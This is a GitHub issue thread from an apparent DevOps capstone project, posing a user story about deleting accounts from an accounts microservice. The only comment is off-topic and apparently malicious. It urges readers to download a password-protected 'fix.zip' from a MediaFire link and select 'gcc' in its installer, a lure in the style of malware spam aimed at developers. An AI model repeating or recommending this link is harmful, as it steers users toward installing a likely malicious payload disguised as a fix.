### ISSUE TITLE
Delete an account from the service

### ISSUE THREAD

**Issue by skpatil99** [skpatil99/devops-capstone-project#6]
As a user
I need to delete an account from the accounts microservice
So that I can remove outdated or inactive customer information

Details and Assumptions
The service should confirm the account's existence before deletion.
The account is permanently removed from the database.
Acceptance Criteria
Given an existing account
When a DELETE request is made to the accounts service
Then the service removes the account from the database

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
